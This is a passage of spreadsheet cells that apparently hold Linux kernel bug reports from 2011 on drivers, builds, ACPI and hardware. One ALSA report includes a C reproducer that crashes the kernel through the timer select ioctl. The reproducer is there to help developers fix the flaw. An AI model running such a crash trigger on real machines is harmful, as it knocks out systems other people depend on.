    <t>Hi. I'm trying to get 802.11n working with followed card: 02:00.0 Network controller: Intel Corporation WiFi Link 5100 It's inside ASUS F6A laptop. I'm connecting it to another machine with: 01:00.0 Network controller: Atheros Communications Inc. AR5008 Wireless Network Adapter (rev 01) Atheros card is in AP mode (with hostapd). And just after connecting I'm getting followed messages: [132378.252140] iwlagn 0000:02:00.0: iwlagn_tx_agg_start on ra = 00:21:91:f3:c8:a1 tid = 0 [132404.533559] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 3 [132427.820093] iwlagn 0000:02:00.0: iwlagn_tx_agg_start on ra = 00:21:91:f3:c8:a1 tid = 0 [132445.826017] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 1 [132448.868061] iwlagn 0000:02:00.0: iwlagn_tx_agg_start on ra = 00:21:91:f3:c8:a1 tid = 0 [132472.781121] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 0 [132479.995679] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 9 [132482.848072] iwlagn 0000:02:00.0: iwlagn_tx_agg_start on ra = 00:21:91:f3:c8:a1 tid = 0 [132505.042703] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 0 [132532.848067] iwlagn 0000:02:00.0: iwlagn_tx_agg_start on ra = 00:21:91:f3:c8:a1 tid = 0 [132551.187911] iwlagn 0000:02:00.0: Aggregation not enabled for tid 0 because load = 0 I'm gettint something around 2.5Mbyte/sec while downloading some large file (fully intranet). Preinstalled Windows Vista is able to download same file at 5-6 mb/sec.</t>
  </si>
  <si>
    <t>[bisected regression] Partial breakage of forcedeth driver</t>
  </si>
  <si>
    <t>2011-07-28 13:40 UTC</t>
  </si>
  <si>
    <t>2011-07-28 14:46 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected regression] Partial breakage of forcedeth driver Submitter : walt &lt;w41ter@gmail.com&gt; Date : 2011-07-24 23:10 Message-ID : 4E2CA683.4010005@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=131154910129151&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline. Caused by: commit 3326c784c9f492e988617d93f647ae0cfd4c8d09 Author: Jiri Pirko &lt;jpirko@&gt; Date: Wed Jul 20 04:54:38 2011 +0000 forcedeth: do vlan cleanup - unify vlan and nonvlan rx path - kill np-&gt;vlangrp and nv_vlan_rx_register - allow to turn on/off rx vlan accel via ethtool (set_features) Signed-off-by: Jiri Pirko &lt;jpirko@redhat.com&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; First-Bad-Commit : 3326c784c9f492e988617d93f647ae0cfd4c8d09</t>
  </si>
  <si>
    <t>IP forwarding regression since 3.0-rc6</t>
  </si>
  <si>
    <t>3.0-rc6</t>
  </si>
  <si>
    <t>2011-07-28 13:45 UTC</t>
  </si>
  <si>
    <t>2012-02-07 17:24 UTC</t>
  </si>
  <si>
    <t>Subject : IP forwarding regression since 3.0-rc6 Submitter : Stephan Seitz &lt;stse+lkml@fsing.rootsland.net&gt; Date : 2011-07-25 12:51 Message-ID : 20110725T141145.GA.2ae38.stse@fsing.rootsland.net References : http://marc.info/?l=linux-kernel&amp;m=131159880004908&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>With latest commit for ecryptfs, it's impossible to compile kernel 3.0.0+</t>
  </si>
  <si>
    <t>3.0.0+</t>
  </si>
  <si>
    <t>2011-07-28 17:27 UTC</t>
  </si>
  <si>
    <t>2011-08-15 09:23 UTC</t>
  </si>
  <si>
    <t>With latest commit for ecryptfs, it's impossible to compile kernel 3.0.0+ fs/built-in.o: In function `ecryptfs_get_encrypted_key_payload_data': /usr/src/linux-3.0/fs/ecryptfs/ecryptfs_kernel.h:86: undefined reference to `key_type_encrypted' fs/built-in.o: In function `ecryptfs_get_encrypted_key': /usr/src/linux-3.0/fs/ecryptfs/ecryptfs_kernel.h:95: undefined reference to `key_type_encrypted' make: *** [.tmp_vmlinux1] Error 1 Making bzImage failed!</t>
  </si>
  <si>
    <t>SATA of intel H61 inside Dell optiplex 390 can't work at ATA mode</t>
  </si>
  <si>
    <t>3.0-rc7</t>
  </si>
  <si>
    <t>2011-08-05 09:40 UTC</t>
  </si>
  <si>
    <t>Lei Ming</t>
  </si>
  <si>
    <t>2012-06-13 15:11 UTC</t>
  </si>
  <si>
    <t>Hi, From pg51 of intel chipset datasheet[1], H61 can't be set in AHCI mode, so we have to make it work at ATA mode. The DVD can't be identified at ATA mode[3] on 2.6.38 kernel, even no changes on 3.0 -rc7 kernel. If further info or tests are required, please let me know. [1], http://www.intel.com/content/www/us/en/chipsets/6-chipset-c200-chipset-datasheet.html - page 51 [2], lspci 00:1f.2 IDE interface [0101]: Intel Corporation 6 Series Chipset Family 4 port SATA IDE Controller [8086:1c00] (rev 04) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: Dell Device [1028:04f5] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 0: I/O ports at 4110 [size=8] Region 1: I/O ports at 4100 [size=4] Region 2: I/O ports at 40f0 [size=8] Region 3: I/O ports at 40e0 [size=4] Region 4: I/O ports at 40d0 [size=16] Region 5: I/O ports at 40c0 [size=16] Capabilities: &lt;access denied&gt; Kernel driver in use: ata_piix [2], dmesg [ 1.088145] ata_piix 0000:00:1f.2: version 2.13 [ 1.088154] ata_piix 0000:00:1f.2: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 1.088159] ata_piix 0000:00:1f.2: MAP [ P0 P2 P1 P3 ] [ 1.240562] ata_piix 0000:00:1f.2: setting latency timer to 64 [ 1.240773] scsi0 : ata_piix [ 1.240826] scsi1 : ata_piix [ 1.240855] ata1: SATA max UDMA/133 cmd 0x4110 ctl 0x4100 bmdma 0x40d0 irq 18 [ 1.240860] ata2: SATA max UDMA/133 cmd 0x40f0 ctl 0x40e0 bmdma 0x40d8 irq 18 [ 1.240874] ata_piix 0000:00:1f.5: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 1.240879] ata_piix 0000:00:1f.5: MAP [ P0 -- P1 -- ] [ 1.396541] ata_piix 0000:00:1f.5: SCR access via SIDPR is available but doesn't work [ 1.396552] ata_piix 0000:00:1f.5: setting latency timer to 64 [ 1.396703] scsi2 : ata_piix [ 1.396743] scsi3 : ata_piix [ 1.396766] ata3: SATA max UDMA/133 cmd 0x40b0 ctl 0x40a0 bmdma 0x4070 irq 18 [ 1.396768] ata4: SATA max UDMA/133 cmd 0x4090 ctl 0x4080 bmdma 0x4078 irq 18 [ 1.396976] Fixed MDIO Bus: probed [ 1.396993] PPP generic driver version 2.4.2 [ 1.397022] tun: Universal TUN/TAP device driver, 1.6 [ 1.397023] tun: (C) 1999-2004 Max Krasnyansky &lt;maxk@qualcomm.com&gt; [ 1.397070] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver [ 1.397079] ehci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 1.397090] ehci_hcd 0000:00:1a.0: setting latency timer to 64 [ 1.397093] ehci_hcd 0000:00:1a.0: EHCI Host Controller [ 1.397113] ehci_hcd 0000:00:1a.0: new USB bus registered, assigned bus number 1 [ 1.397147] ehci_hcd 0000:00:1a.0: debug port 2 [ 1.401034] ehci_hcd 0000:00:1a.0: cache line size of 64 is not supported [ 1.401044] ehci_hcd 0000:00:1a.0: irq 16, io mem 0x91a40000 [ 1.416535] ehci_hcd 0000:00:1a.0: USB 2.0 started, EHCI 1.00 [ 1.416643] hub 1-0:1.0: USB hub found [ 1.416646] hub 1-0:1.0: 2 ports detected [ 1.416689] ehci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 1.416696] ehci_hcd 0000:00:1d.0: setting latency timer to 64 [ 1.416699] ehci_hcd 0000:00:1d.0: EHCI Host Controller [ 1.416721] ehci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 2 [ 1.416753] ehci_hcd 0000:00:1d.0: debug port 2 [ 1.420626] ehci_hcd 0000:00:1d.0: cache line size of 64 is not supported [ 1.420636] ehci_hcd 0000:00:1d.0: irq 17, io mem 0x91a20000 [ 1.436535] ehci_hcd 0000:00:1d.0: USB 2.0 started, EHCI 1.00 [ 1.436640] hub 2-0:1.0: USB hub found [ 1.436642] hub 2-0:1.0: 2 ports detected [ 1.436676] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver [ 1.436683] uhci_hcd: USB Universal Host Controller Interface driver [ 1.436728] i8042: PNP: No PS/2 controller found. Probing ports directly. [ 1.439478] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 1.439482] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 1.439549] mousedev: PS/2 mouse device common for all mice [ 1.439622] rtc_cmos 00:06: RTC can wake from S4 [ 1.439663] rtc_cmos 00:06: rtc core: registered rtc_cmos as rtc0 [ 1.439688] rtc0: alarms up to one year, y3k, 242 bytes nvram, hpet irqs [ 1.439731] device-mapper: uevent: version 1.0.3 [ 1.439775] device-mapper: ioctl: 4.19.1-ioctl (2011-01-07) initialised: dm-devel@redhat.com [ 1.439811] device-mapper: multipath: version 1.2.0 loaded [ 1.439813] device-mapper: multipath round-robin: version 1.0.0 loaded [ 1.439848] EISA: Probing bus 0 at eisa.0 [ 1.439849] EISA: Cannot allocate resource for mainboard [ 1.439851] Cannot allocate resource for EISA slot 1 [ 1.439852] Cannot allocate resource for EISA slot 2 [ 1.439853] Cannot allocate resource for EISA slot 3 [ 1.439854] Cannot allocate resource for EISA slot 4 [ 1.439855] Cannot allocate resource for EISA slot 5 [ 1.439856] Cannot allocate resource for EISA slot 6 [ 1.439857] Cannot allocate resource for EISA slot 7 [ 1.439858] Cannot allocate resource for EISA slot 8 [ 1.439859] EISA: Detected 0 cards. [ 1.439955] cpuidle: using governor ladder [ 1.440057] cpuidle: using governor menu [ 1.440188] TCP cubic registered [ 1.440257] NET: Registered protocol family 10 [ 1.440546] NET: Registered protocol family 17 [ 1.440554] Registering the dns_resolver key type [ 1.441200] Using IPI No-Shortcut mode [ 1.441251] PM: Hibernation image not present or could not be loaded. [ 1.441257] registered taskstats version 1 [ 1.441458] Magic number: 15:255:133 [ 1.441478] acpi device:08: hash matches [ 1.441537] rtc_cmos 00:06: setting system clock to 2011-06-08 15:07:22 UTC (1307545642) [ 1.441539] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found [ 1.441540] EDD information not available. [ 1.696560] Refined TSC clocksource calibration: 3292.520 MHz. [ 1.696565] Switching to clocksource tsc [ 1.728564] usb 1-1: new high speed USB device using ehci_hcd and address 2 [ 1.861295] hub 1-1:1.0: USB hub found [ 1.861503] hub 1-1:1.0: 4 ports detected [ 1.972565] usb 2-1: new high speed USB device using ehci_hcd and address 2 [ 2.105284] hub 2-1:1.0: USB hub found [ 2.105362] hub 2-1:1.0: 6 ports detected [ 2.376764] usb 2-1.3: new low speed USB device using ehci_hcd and address 3 [ 2.544758] usb 2-1.4: new low speed USB device using ehci_hcd and address 4 [ 2.588538] ata2.01: failed to resume link (SControl 0) [ 2.600524] ata1.01: failed to resume link (SControl 0) [ 2.655973] hub 2-1:1.0: over-current change on port 1 [ 2.744601] ata2.00: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 2.744615] ata2.01: SATA link down (SStatus 0 SControl 0) [ 2.744626] ata2.01: link offline, clearing class 3 to NONE [ 2.752672] ata2.00: ATAPI: Optiarc DVD+/-RW AD-7717H, 101A, max UDMA/100 [ 2.756598] ata1.00: SATA link up 3.0 Gbps (SStatus 123 SControl 300) [ 2.756609] ata1.01: SATA link down (SStatus 0 SControl 0) [ 2.760680] hub 2-1:1.0: over-current change on port 2 [ 2.765468] ata1.00: ATA-8: WDC WD2500AAKX-753CA0, 15.01H15, max UDMA/133 [ 2.765472] ata1.00: 488397168 sectors, multi 16: LBA48 NCQ (depth 0/32) [ 2.768666] ata2.00: configured for UDMA/100 [ 2.869545] ata2.00: TEST_UNIT_READY failed (err_mask=0x2) [ 7.744425] ata1.00: configured for UDMA/133 [ 7.744573] scsi 0:0:0:0: Direct-Access ATA WDC WD2500AAKX-7 15.0 PQ: 0 ANSI: 5 [ 7.744656] sd 0:0:0:0: Attached scsi generic sg0 type 0 [ 7.744709] sd 0:0:0:0: [sda] 488397168 512-byte logical blocks: (250 GB/232 GiB) [ 7.744757] sd 0:0:0:0: [sda] Write Protect is off [ 7.744760] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [ 7.744778] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 7.775620] sda: sda1 sda2 &lt; sda5 &gt; [ 7.775851] sd 0:0:0:0: [sda] Attached SCSI disk [ 9.092378] ata2.01: failed to resume link (SControl 0) [ 9.248425] ata2.00: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 9.248439] ata2.01: SATA link down (SStatus 0 SControl 0) [ 9.248450] ata2.01: link offline, clearing class 3 to NONE [ 9.272501] ata2.00: configured for UDMA/100 [ 14.272148] ata2.00: qc timeout (cmd 0xa0) [ 14.272153] ata2.00: TEST_UNIT_READY failed (err_mask=0x4) [ 14.272158] ata2.00: limiting SATA link speed to 1.5 Gbps [ 14.272161] ata2.00: limiting speed to UDMA/100:PIO3 [ 15.620205] ata2.01: failed to resume link (SControl 0) [ 15.776246] ata2.00: SATA link up 1.5 Gbps (SStatus 113 SControl 310) [ 15.776260] ata2.01: SATA link down (SStatus 0 SControl 0) [ 15.776271] ata2.01: link offline, clearing class 3 to NONE [ 15.800336] ata2.00: configured for UDMA/100 [ 20.799951] ata2.00: qc timeout (cmd 0xa0) [ 20.799956] ata2.00: TEST_UNIT_READY failed (err_mask=0x4) [ 20.799958] ata2.00: disabled [ 20.799979] ata2.00: hard resetting link [ 21.120063] ata2.01: hard resetting link [ 22.148022] ata2.01: failed to resume link (SControl 0) [ 22.304097] ata2.00: SATA link up 1.5 Gbps (SStatus 113 SControl 310) [ 22.304111] ata2.01: SATA link down (SStatus 0 SControl 0) [ 22.304122] ata2.01: link offline, clearing class 3 to NONE [ 22.304125] ata2: EH complete</t>
  </si>
  <si>
    <t>UART not automatically enabled</t>
  </si>
  <si>
    <t>2011-08-05 15:11 UTC</t>
  </si>
  <si>
    <t>2012-01-19 02:03 UTC</t>
  </si>
  <si>
    <t>Jeff says: &gt; I'm trying to access the serial port ttyS2 that is set in the BIOS as &gt; "OS Controlled" without much success. If it's set it to "Always &gt; Enabled", I can access the serial port. &gt; This is on the Intermec CV60, and ttyS2 is the touchscreen port. &gt; # setserial /dev/ttyS2 &gt; /dev/ttyS2, UART: 16550A, Port: 0x03e8, IRQ: 6 &gt; If I set the BIOS to "OS Controlled", I can't access the serial port &gt; no matter what parameter I pass to the setserial. The factory default &gt; is "OS Controlled", and Window XP can detect and access the port. and found that this is enough to enable it: &gt; echo "auto" &gt; /sys/bus/pnp/devices/00:0a/resources My guess (with no evidence) is that running _SRS enables the device, and that Windows does that automatically but Linux doesn't. I think it's a bug that Linux doesn't make this port work automatically.</t>
  </si>
  <si>
    <t>screen flickers, touchpad unreliable, kernel crashes; unless acpi=off - Lenovo Ideapad U455, AMD Athlon(tm) Neo Processor MV-40</t>
  </si>
  <si>
    <t>3.4.0-rc5</t>
  </si>
  <si>
    <t>2011-08-07 15:56 UTC</t>
  </si>
  <si>
    <t>2013-02-08 18:28 UTC</t>
  </si>
  <si>
    <t>Created attachment 67872 [details] acpidump output Without any custom options my system boots, but it is unstable: screen sometimes flickers, garbage appears in framebuffer, touchpad not always works and sometimes kernel even crashes at boot time. With acpi=off everything boots and works stable without any flickering and without garbage in framebuffer. I've tried to boot with `acpi=ht`, but issues were still here.</t>
  </si>
  <si>
    <t>Oops in alsa /dev/snd/timer device with SNDRV_TIMER_IOCTL_SELECT ioctl</t>
  </si>
  <si>
    <t>2.6.29.1, ...</t>
  </si>
  <si>
    <t>2011-08-07 17:14 UTC</t>
  </si>
  <si>
    <t>some</t>
  </si>
  <si>
    <t>Hi. I have this Oops [ 6642.899997] BUG: unable to handle kernel NULL pointer dereference at 000000e8 [ 6642.900126] IP: [&lt;c01176f5&gt;] __ticket_spin_lock+0x5/0x15 [ 6642.900126] *pde = 00000000 [ 6642.900126] Oops: 0000 [#18] SMP [ 6642.900126] last sysfs file: /sys/devices/pci0000:00/0000:00:14.0/class [ 6642.900126] Modules linked in: nls_iso8859_1 nls_cp437 vfat fat usb_storage binfmt_misc ipv6 loop sd_mod snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device mptspi mptscsih mptbase ac parport_pc parport floppy thermal ohci_hcd scsi_transport_spi psmouse i2c_piix4 snd ehci_hcd processor thermal_sys button serio_raw scsi_mod i2c_core pcnet32 mii pcspkr usbcore soundcore snd_page_alloc evdev [ 6642.900126] [ 6642.900126] Pid: 3495, comm: exx Tainted: G D (2.6.29.1 #13) VirtualBox [ 6642.900126] EIP: 0060:[&lt;c01176f5&gt;] EFLAGS: 00010086 CPU: 0 [ 6642.900126] EIP is at __ticket_spin_lock+0x5/0x15 [ 6642.900126] EAX: 000000e8 EBX: 00000282 ECX: 00000000 EDX: 00000100 [ 6642.900126] ESI: 000000e8 EDI: df2e125c EBP: df514be8 ESP: daa73f38 [ 6642.900126] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 6642.900126] Process exx (pid: 3495, ti=daa72000 task=daa42810 task.ti=daa72000) [ 6642.900126] Stack: [ 6642.900126] c0117792 c042f619 df2e125c da9219c0 e0c42f9d dabd48c0 da9219c0 e0c43685 [ 6642.900126] df2e1380 00000010 dabd48c0 da9fad40 df2e125c df514be8 e0c436ae 00000010 [ 6642.900126] c018a4d5 df80dec0 da9fad40 00000000 daa7f6c0 daa72000 c0187da1 daa7f6c0 [ 6642.900126] Call Trace: [ 6642.900126] [&lt;c0117792&gt;] default_spin_lock_flags+0x5/0x7 [ 6642.900126] [&lt;c042f619&gt;] _spin_lock_irqsave+0x25/0x2b [ 6642.900126] [&lt;e0c42f9d&gt;] snd_timer_stop+0x23/0x3e [snd_timer] [ 6642.900126] [&lt;e0c43685&gt;] snd_timer_close+0x211/0x220 [snd_timer] [ 6642.900126] [&lt;e0c436ae&gt;] snd_timer_user_release+0x1a/0x35 [snd_timer] [ 6642.900126] [&lt;c018a4d5&gt;] __fput+0xa6/0x150 [ 6642.900126] [&lt;c0187da1&gt;] filp_close+0x4e/0x54 [ 6642.900126] [&lt;c0187e0b&gt;] sys_close+0x64/0x9f [ 6642.900126] [&lt;c0103466&gt;] syscall_call+0x7/0xb [ 6642.900126] Code: 24 0c 89 da 89 f0 5b 5e e9 91 fd ff ff 89 4c 24 0c 89 f1 0f b7 d2 89 5c 24 10 0f b6 c0 5b 5e e9 a5 fd ff ff 90 90 ba 00 01 00 00 &lt;3e&gt; 66 0f c1 10 38 f2 74 06 f3 90 8a 10 eb f6 c3 53 89 c3 0f b7 [ 6642.900126] EIP: [&lt;c01176f5&gt;] __ticket_spin_lock+0x5/0x15 SS:ESP 0068:daa73f38 [ 6642.900126] ---[ end trace 11e604579b3dcb21 ]--- I can reproduce it with this code: --------------------------------------------------------------- #include &lt;grp.h&gt; #include &lt;stdio.h&gt; #include &lt;fcntl.h&gt; #include &lt;errno.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/wait.h&gt; #include &lt;sys/stat.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/param.h&gt; #include &lt;sys/types.h&gt; #include &lt;linux/soundcard.h&gt; struct snd_timer_id { int dev_class; int dev_sclass; int card; int device; int subdevice; }; struct snd_timer_select { struct snd_timer_id id; /* bind to timer ID */ unsigned char reserved[32]; /* reserved */ }; #define SNDRV_TIMER_IOCTL_SELECT _IOW('T', 0x10, struct snd_timer_select) main(int argc, char **argv) { int h; struct snd_timer_select sel; h=open("/dev/snd/timer",O_RDONLY | O_NONBLOCK); if(h&lt; 0) { perror("open"); exit(0); } sel.id.dev_class = 0; sel.id.dev_sclass = 1; if(ioctl(h, SNDRV_TIMER_IOCTL_SELECT,&amp;sel)&gt;=0) { printf("ok\n"); } close(h); return 1; } ------------------------------------------------------------------ Bug is placed int sound/core/timer.c in snd_timer_user_tselect function.</t>
  </si>
  <si>
    <t>cpu0 lockup when a sound is played thru USB soundcard connected to xHCI USB 3.0 controller</t>
  </si>
  <si>
    <t>v3.0-7530-gde96355</t>
  </si>
  <si>
    <t>2011-08-07 20:18 UTC</t>
  </si>
  <si>
    <t>Matej Laitl</t>
  </si>
  <si>
    <t>2012-02-23 22:15 UTC</t>
  </si>
  <si>
    <t>Everytime I try to play a sound file though a NI Audio4DJ USB soundcard (snd-usb-caiaq module) that is connected to a NEC Corporation uPD720200 USB 3.0 Host Controller (xhci-hcd module), the system completely hangs. dmesg reports stalls or hard lockups on cpu 0; magic-sysrq-key doesn't work, but tasks on other cpus still apparently run. The card runs in the USB 2.0 (480M) mode. The bug does NOT occur when the same soundcard is connected to a USB 2.0 (ehci) ports. Non-sound communication with the soundcard works even on USB 3.0: input mode can be set correctly using amixer. Steps to reproduce: 1. connect a USB soundcard (Audio4DJ used) to a USB 3.0 port (NEC uPD720200 xHCI used) 2. try to play a sound: aplay -D plughw:Audio4DJ sound.wav 3. system (cpu 0) locks up The bug happens everytime on v3.0-7530-gde96355 and also on v3.0.0. I cannot easily test older kernels due to EFI bugs. Please find attached 2 dmesg screenshots from the hang, lockup-debug-off.png is from a kernel build without debugging-enabled kernel, lockup-debug-on.png is with a debugging kernel that has small debugging.patch applied that just adds a few printks. .config, lspci -vvnn, lsusb -v outputs attached refer to the debugging kernel prior to the hang.</t>
  </si>
  <si>
    <t>brcmsmac creates no wlan0 device</t>
  </si>
  <si>
    <t>3.0.1</t>
  </si>
  <si>
    <t>2011-08-08 12:38 UTC</t>
  </si>
  <si>
    <t>guitar76</t>
  </si>
  <si>
    <t>2012-02-02 20:45 UTC</t>
  </si>
  <si>
    <t>Since I upgraded to kernel 3.0.1 from 2.6.39 no wlan0 (or similar) device is created by the brcmsmac-driver for my bcm4313. There were no problems in kernel 2.6.39. I don't get any error messages. Interesting part is when I specifically load the module on boot (even though it gets loaded automatically) the driver works without problems.</t>
  </si>
  <si>
    <t>Cannot change brightness on laptop with ATI Radeon 6470M</t>
  </si>
  <si>
    <t>3.0.0, 3.0.1</t>
  </si>
  <si>
    <t>2011-08-10 13:44 UTC</t>
  </si>
  <si>
    <t>Vasilis Lourdas</t>
  </si>
  <si>
    <t>2012-12-13 00:27 UTC</t>
  </si>
  <si>
    <t>When I press Fn+F9 or F10 which are the keyboard buttons to decrease/increase the screen brightness of my HP Probook 6560b laptop, nothing happens. acpi_listen reports: video/brightnessdown BRTDN 00000087 00000000 video/brightnessdown BRTDN 00000087 00000000 video/brightnessup BRTUP 00000086 00000000 video/brightnessup BRTUP 00000086 00000000 /var/log/messages shows: Aug 10 16:41:04 localhost dbus[2038]: [system] Successfully activated service 'org.kde.powerdevil.backlighthelper' Aug 10 16:41:06 localhost logger: ACPI event unhandled: video/brightnessdown BRTDN 00000087 00000000 Aug 10 16:41:09 localhost logger: ACPI event unhandled: video/brightnessup BRTUP 00000086 00000000 Aug 10 16:41:10 localhost logger: ACPI event unhandled: video/brightnessup BRTUP 00000086 00000000 Aug 10 16:41:18 localhost logger: ACPI event unhandled: battery PNP0C0A:00 00000080 00000001 Aug 10 16:42:23 localhost logger: ACPI event unhandled: battery PNP0C0A:00 00000080 00000001 I'm using x86_64 kernel from Gentoo packages (gentoo-sources). The issue persists both in kernels 3.0.0 and 3.0.1.</t>
  </si>
  <si>
    <t>R100 firmware no longer loads</t>
  </si>
  <si>
    <t>3.1.0-rc1-00035-ge6a99d3</t>
  </si>
  <si>
    <t>2011-08-11 17:07 UTC</t>
  </si>
  <si>
    <t>2011-08-29 18:15 UTC</t>
  </si>
  <si>
    <t>With kernel 3.1.0-rc1-00035-ge6a99d3 I now get: [drm] Loading R100 Microcode ------------[ cut here ]------------ WARNING: at drivers/base/firmware_class.c:524 _request_firmware+0x37d/0x3a0() Hardware name: Inspiron 8100 Modules linked in: Pid: 1, comm: swapper Not tainted 3.1.0-rc1-00035-ge6a99d3 #32 Call Trace: [ 1.036839] Call Trace: [ 1.036883] [&lt;c153ba2a&gt;] ? printk+0x1d/0x1f [ 1.036933] [&lt;c1031252&gt;] warn_slowpath_common+0x72/0xa0 [ 1.036978] [&lt;c1372a9d&gt;] ? _request_firmware+0x37d/0x3a0 [ 1.037064] [&lt;c1372a9d&gt;] ? _request_firmware+0x37d/0x3a0 [ 1.037111] [&lt;c10312a0&gt;] warn_slowpath_null+0x20/0x30 [ 1.037156] [&lt;c1372a9d&gt;] _request_firmware+0x37d/0x3a0 [ 1.037202] [&lt;c136a017&gt;] ? platform_device_add+0xf7/0x1e0 [ 1.037248] [&lt;c1372b5f&gt;] request_firmware+0x1f/0x30 [ 1.037296] [&lt;c130bc68&gt;] r100_cp_init+0x298/0x880 [ 1.037341] [&lt;c1310ac4&gt;] r100_startup+0x224/0x320 [ 1.037385] [&lt;c131101a&gt;] r100_init+0x12a/0x290 [ 1.037431] [&lt;c12d32a5&gt;] radeon_device_init+0x345/0x410 [ 1.037476] [&lt;c12d1b10&gt;] ? cail_reg_write+0x40/0x40 [ 1.037522] [&lt;c12d484f&gt;] radeon_driver_load_kms+0x7f/0x110 [ 1.037569] [&lt;c12a5893&gt;] drm_get_pci_dev+0x143/0x260 [ 1.037615] [&lt;c1537122&gt;] radeon_pci_probe+0x82/0x87 [ 1.037661] [&lt;c12127bc&gt;] pci_device_probe+0x8c/0x120 [ 1.037707] [&lt;c1149ed7&gt;] ? sysfs_create_link+0x17/0x20 [ 1.037756] [&lt;c1368516&gt;] driver_probe_device+0x66/0x170 [ 1.037800] [&lt;c12126f9&gt;] ? pci_match_device+0xc9/0xe0 [ 1.037845] [&lt;c13686b1&gt;] __driver_attach+0x91/0xa0 [ 1.037889] [&lt;c1368620&gt;] ? driver_probe_device+0x170/0x170 [ 1.037935] [&lt;c1367769&gt;] bus_for_each_dev+0x49/0x70 [ 1.037979] [&lt;c12116c0&gt;] ? pci_dev_put+0x20/0x20 [ 1.038041] [&lt;c1368221&gt;] driver_attach+0x21/0x30 [ 1.038086] [&lt;c1368620&gt;] ? driver_probe_device+0x170/0x170 [ 1.038132] [&lt;c1367f07&gt;] bus_add_driver+0x187/0x250 [ 1.038176] [&lt;c12116c0&gt;] ? pci_dev_put+0x20/0x20 [ 1.038220] [&lt;c1368bba&gt;] driver_register+0x6a/0x120 [ 1.038264] [&lt;c12121fc&gt;] __pci_register_driver+0x3c/0xb0 [ 1.038309] [&lt;c12a5acc&gt;] drm_pci_init+0x11c/0x130 [ 1.038356] [&lt;c177d6e9&gt;] ? start_kernel+0x2d0/0x2d0 [ 1.038402] [&lt;c179b98d&gt;] radeon_init+0xd4/0xd6 [ 1.038446] [&lt;c1001124&gt;] do_one_initcall+0x34/0x170 [ 1.038490] [&lt;c179b8b9&gt;] ? ttm_init+0x64/0x64 [ 1.038533] [&lt;c177d6e9&gt;] ? start_kernel+0x2d0/0x2d0 [ 1.038576] [&lt;c177d757&gt;] kernel_init+0x6e/0xfa [ 1.038620] [&lt;c15486b6&gt;] kernel_thread_helper+0x6/0x10 ---[ end trace 6a17ba782679faba ]--- platform radeon_cp.0: firmware: radeon/R100_cp.bin will not be loaded radeon_cp: Failed to load firmware "radeon/R100_cp.bin" [drm:r100_cp_init] *ERROR* Failed to load firmware! radeon 0000:01:00.0: failed initializing CP (-16). radeon 0000:01:00.0: Disabling GPU acceleration It worked fine with 3.0.0. The firmware is compiled in to the kernel. Doing bisects on this box is painful; it may be some time before I can do so.</t>
  </si>
  <si>
    <t>[PATCH]Incorrect battery capacity after power up/reboot on recent Thinkpads</t>
  </si>
  <si>
    <t>3.1-rc1</t>
  </si>
  <si>
    <t>2011-08-13 03:43 UTC</t>
  </si>
  <si>
    <t>Kamil Iskra</t>
  </si>
  <si>
    <t>Recent Thinkpads (I'm seeing this on last year's x201 as well as this year's x220, but not on older T61 or T42) display incorrect battery capacity in /proc/acpi/battery/*/*. The bug is easily reproducible, but subtle. These recent Thinkpad models have a weird "feature" that the battery charge in /proc/acpi/battery/*/* is initially (after power up/reboot) reported in mAh, but after a suspend/resume cycle while running on battery, it changes to mWh. Here's /proc/acpi/battery/BAT0/info after reboot: present: yes design capacity: 2886 mAh last full capacity: 2909 mAh battery technology: rechargeable design voltage: 14800 mV design capacity warning: 145 mAh design capacity low: 13 mAh cycle count: 0 capacity granularity 1: 1 mAh capacity granularity 2: 1 mAh model number: 42T4899 serial number: 21064 battery type: LION OEM info: SANYO After a suspend/resume cycle the output changes to: present: yes design capacity: 28860 mWh last full capacity: 29090 mWh battery technology: rechargeable design voltage: 14800 mV design capacity warning: 1454 mWh design capacity low: 200 mWh cycle count: 0 capacity granularity 1: 1 mWh capacity granularity 2: 1 mWh model number: 42T4899 serial number: 21064 battery type: LION OEM info: SANYO Can you see how the values for "design capacity", etc. differ by a factor of 10, instead of 14.8 (the design voltage of this battery)? On the battery itself it says: 14.8V, 1.95Ah, 29Wh, so clearly the 